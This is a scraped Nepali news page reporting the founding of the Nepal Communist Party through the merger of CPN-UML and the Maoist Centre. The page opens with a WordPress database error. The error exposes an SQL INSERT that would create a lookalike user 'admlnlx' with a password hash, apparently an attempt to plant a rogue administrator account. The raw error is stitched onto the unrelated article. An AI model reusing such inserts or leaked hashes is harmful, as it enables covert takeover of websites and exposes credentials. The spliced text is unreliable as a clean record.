WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BnAEZE2adCRc5X1ZiaTD.jUfUparjG.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 21:23:42', '', 'admlnlx', 'admlnlx')
काठमाडौं । नेकपा एमाले र नेकपा माओवादी केन्द्रबीचको एकता प्रक्रियाबाट बनेको नेपाल कम्युनिष्ट पार्टीको घोषणा गरिएको छ ।
काठमाण्डौको भृकुटीमण्डपस्थित राष्ट्रिय सभागृहमा आयोजित पार्टी एकता घोषणा कार्यक्रममा पार्टीका अध्यक्षद्वय केपी शर्मा ओली र पुष्पकमल दाहाल ‘प्रचण्ड’ ले नयाँ पार्टी स्थापना भएको घोषणा गरेका हुन् ।
विसं २००६ मा पुष्पलालको नेतृत्वमा गठित साम्यवादी दलको नाम नेकपा नै थियो । करीब सत्तरी वर्षअघि नेकपा घोषणा गर्दा पाँच जना संस्थापक (नरबहादुर कर्माचार्य, नारायणविला जोशी, निरञ्जनगोविन्द वैद्य र मोतीदेवी श्रेष्ठसहित) थिए भने आज ४४१ जनाको केन्द्रीय सदस्य घोषणा गरिएको छ ।
कम्युनिष्ट पार्टीमा हाइकमाण्ड, स्थायी समिति र केन्द्रीय
समितिसमेत गठन गरिसकेको छ । स्थायी समितिमा ४५ जना सदस्य र हाइकमाण्ड समितिमा ९ जना रहेका छन् ।
